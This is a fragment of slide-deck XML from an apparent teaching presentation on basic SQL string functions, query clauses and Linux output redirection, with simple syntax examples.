                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>columnN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> LIKE </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3015" name="Google Shape;3015;p489"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="985150" y="930475"/>
            <a:ext cx="7539000" cy="81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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3150">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>SQL LIKE Operator</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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490"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531475" y="1626825"/>
            <a:ext cx="8179500" cy="25347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3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84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lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84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lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	ascii(‘A’)  → 65</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84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lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> ascii decimal value</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3021" name="Google Shape;3021;p490"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="985150" y="930475"/>
            <a:ext cx="7539000" cy="81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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3150" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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p491"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242425" y="1626825"/>
            <a:ext cx="8755200" cy="2423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2500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SUBSTRING(string, start_position, length)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84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500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>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rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>JITESH</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>substring('JITESH',3,1);</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3027" name="Google Shape;3027;p491"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="985150" y="930475"/>
            <a:ext cx="7539000" cy="81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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3150" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>SUBSTRING</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3032" name="Google Shape;3032;p492"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242425" y="1626825"/>
            <a:ext cx="8755200" cy="2915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2900">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(string)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84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900">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>JITESH</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>length('JITESH'); Output 6</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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b="1" sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3033" name="Google Shape;3033;p492"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="985150" y="930475"/>
            <a:ext cx="7539000" cy="816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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3150">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>LENGTH</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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p493"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="7498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Order By</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3039" name="Google Shape;3039;p493"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1831075"/>
            <a:ext cx="8520600" cy="224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650">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>column1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> column2, ...</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2650">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>table_name </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>someCol=SomeValue</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2650">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ORDER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>column1, column2, ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ASC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>DESC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="33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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279525" y="417175"/>
            <a:ext cx="875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a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Input Output Redirection in Linux</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Google Shape;382;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827325" y="1032625"/>
            <a:ext cx="7659600" cy="3286500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>cho ‘Hello’ &gt; anil.txt</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>echo “Hello” &gt;&gt; vishal.txt</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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3" name="Shape 3043"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3044" name="Google Shape;3044;p494"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="5974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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Limit Offset,Limit</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3045" name="Google Shape;3045;p494"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1598950"/>
            <a:ext cx="8520600" cy="297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50">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>column1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
